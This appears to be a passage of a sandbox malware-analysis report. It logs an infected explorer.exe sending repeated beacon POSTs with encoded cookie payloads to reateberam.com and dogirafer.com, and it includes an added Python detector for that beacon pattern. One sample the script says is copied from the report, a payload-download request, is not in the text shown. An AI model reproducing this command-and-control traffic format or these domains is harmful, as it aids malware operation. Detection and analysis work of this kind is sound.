Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 8_2_0303900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 8_2_0303900C
Source: global traffic DNS traffic detected: DNS query: huanvn.com
Source: global traffic DNS traffic detected: DNS query: vutarf.com
Source: global traffic DNS traffic detected: DNS query: reateberam.com
Source: global traffic DNS traffic detected: DNS query: dogirafer.com
Source: unknown HTTP traffic detected:
    POST /test/ HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Cookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
    Host: reateberam.com
    Content-Length: 92
    Cache-Control: no-cache
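The requests captured above share three traits that can be checked without decrypting anything: a User-Agent that ends in the non-standard token "Tob 1.1", a Cookie header that carries one bare base64 token instead of name=value pairs, and (for the dogirafer.com beacons) a form-encoded POST with Content-Length: 0. The Python below is an added example, not part of this report and not the sandbox's or the malware's code: it splits the report's single-line request dumps back into headers, scores each request against those traits, and lists the (host, path) pairs that match. Three of the sample lines are copied from the report; the fourth, benign request is constructed to show the check stays quiet on ordinary traffic. The decision rule (UA tail alone, or cookie shape plus empty POST together) is this example's own choice, not a rule from the report.

```python
"""Parse the fused HTTP request lines from this report and flag the beacon pattern.

Added illustration, not code from the sandbox vendor or from the malware. The sample
lines are copied from the report (three of its requests) plus one constructed benign
request; the detection thresholds are this example's own choices.
"""
import re
from typing import Dict, List, Tuple

# Header names seen in the report's requests; the sandbox printed each request on one
# line with no separator, so we split just before "<Name>: ".
_HEADER_NAMES = ("Accept", "Content-Type", "Cookie", "User-Agent", "Host",
                 "Content-Length", "Cache-Control", "Connection")
_SPLIT_RE = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, _HEADER_NAMES)))
_REPORT_PREFIX_RE = re.compile(r"^Source: .*?HTTP traffic detected: ")

# A Cookie header that is one long base64-looking token instead of name=value pairs.
# We only check the alphabet and shape; the value is never decoded.
_BARE_B64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
# The non-standard tail of the User-Agent in every request the report captured.
_UA_TAIL = "Tob 1.1)"


def parse_fused_request(line: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (method, path, headers) for one report line; header names lower-cased."""
    raw = _REPORT_PREFIX_RE.sub("", line)
    request_line, *header_parts = _SPLIT_RE.split(raw)
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for part in header_parts:
        name, _, value = part.partition(": ")
        headers[name.lower()] = value
    return method, path, headers


def beacon_indicators(method: str, path: str, headers: Dict[str, str]) -> List[str]:
    """List the indicators a request matches; an empty list means none matched."""
    hits: List[str] = []
    if headers.get("user-agent", "").endswith(_UA_TAIL):
        hits.append("ua-tob")
    if _BARE_B64_RE.match(headers.get("cookie", "")):
        hits.append("cookie-bare-base64")     # opaque data carried in the Cookie header
    if (method == "POST"
            and headers.get("content-type") == "application/x-www-form-urlencoded"
            and headers.get("content-length") == "0"):
        hits.append("empty-form-post")        # form POST that carries no body at all
    return hits


def is_suspect_beacon(hits: List[str]) -> bool:
    """The UA tail alone is decisive; the other two indicators must co-occur."""
    return "ua-tob" in hits or {"cookie-bare-base64", "empty-form-post"} <= set(hits)


def c2_endpoints(lines: List[str]) -> List[Tuple[str, str]]:
    """Unique (host, path) pairs from the lines that match the beacon pattern."""
    found = set()
    for line in lines:
        method, path, headers = parse_fused_request(line)
        if is_suspect_beacon(beacon_indicators(method, path, headers)):
            found.add((headers.get("host", ""), path))
    return sorted(found)


SAMPLE_LINES = [
    # Three requests copied from the report as the sandbox printed them.
    "Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive",
    "Source: unknown HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache",
    # Constructed benign request (not from the report) to show the check stays quiet.
    "Source: global traffic HTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: www.example.comCookie: session=abc123; theme=dark",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        method, path, headers = parse_fused_request(line)
        hits = beacon_indicators(method, path, headers)
        print(f"{method} {headers.get('host')}{path}: {hits or 'clean'}")
    print("C2 endpoints:", c2_endpoints(SAMPLE_LINES))
```

Run as a script it prints the indicators per request and the three endpoints the report shows (dogirafer.com/test/, reateberam.com/files/stkm.bin, reateberam.com/test/). The UA tail is the high-confidence signal here; the cookie-shape check is deliberately kept as a corroborating indicator only, since a bare base64 Cookie value is unusual but not unique to this sample.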
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000008.00000002.4535485561.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3880ff7
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r10.o.lencr.o
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r10.o.lencr.org0#
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0
Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: explorer.exe, 00000008.00000000.2322979543.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2322953274.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4547057338.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 